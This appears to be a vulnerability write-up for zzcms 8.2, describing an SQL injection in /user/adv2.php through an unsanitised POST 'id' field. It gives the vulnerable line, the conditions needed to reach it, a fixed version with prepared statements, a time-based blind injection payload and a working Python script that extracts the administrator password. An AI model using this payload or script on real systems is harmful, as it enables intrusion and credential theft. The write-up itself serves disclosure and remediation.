
/user/adv2.php

Edition: zzcms 8.2

Location: /user/adv2.php

Code:

```php
$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");
```
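For comparison, the same lookup written so that the user-supplied `id` cannot alter the query. This is an added example, not zzcms code: it assumes a `mysqli` connection in `$db` (zzcms's own `query()` helper is not used) and keeps the table name from the page.

```php
<?php
// Added example (not from zzcms): the same lookup with the POSTed id validated
// as an integer and bound through a prepared statement.
// Assumes an open mysqli connection in $db (mysqlnd for get_result()).

function load_ad(mysqli $db, array $post): ?array
{
    // Accept only a plain positive decimal integer. An expression such as
    // "0 or if(...,sleep(3),0)" fails validation and never reaches SQL.
    $id = filter_var(
        $post['id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false || $id === null) {
        return null;
    }

    // Even with a validated integer, bind the value instead of concatenating it,
    // so the query text is fixed and the value is sent separately.
    $stmt = $db->prepare('SELECT * FROM zzcms_ad WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}

// In place of the original query() call:
// $rs = load_ad($db, $_POST);
```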

Line: 72

Harm

The administrator password can be obtained through SQL injection.

Cause

Look at the logic around the bug and trace backwards from the query. To reach this line, the code first requires that a and c are not both 0.

That is, either zzcms_main or zzcms_zh must have a value; if neither does, the user is simply told they have no permission. In that case the request can be sent directly as a POST.

Tracing back further, the request also needs action=modify.

With that in place, debug it first: stepping through in phpstorm with id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0) shows that the delay really occurs.

PoC

```python
import requests

s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
# a logged-in member cookie is needed to pass the permission check described above
cookies = {
    'UserName': 'test2'
}
flag = ''
for i in range(1, 40):            # position of the character in the password field
    for j in range(33, 125):      # candidate printable ASCII values
        data = {
            'id': '0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i, j)
        }
        r = s.post(url, data=data, cookies=cookies)
        sec = r.elapsed.seconds
        if sec > 2:               # response was delayed, so the guess matched
            flag += chr(j)
            print(flag)
            break
print(flag)
```

This retrieves the administrator password.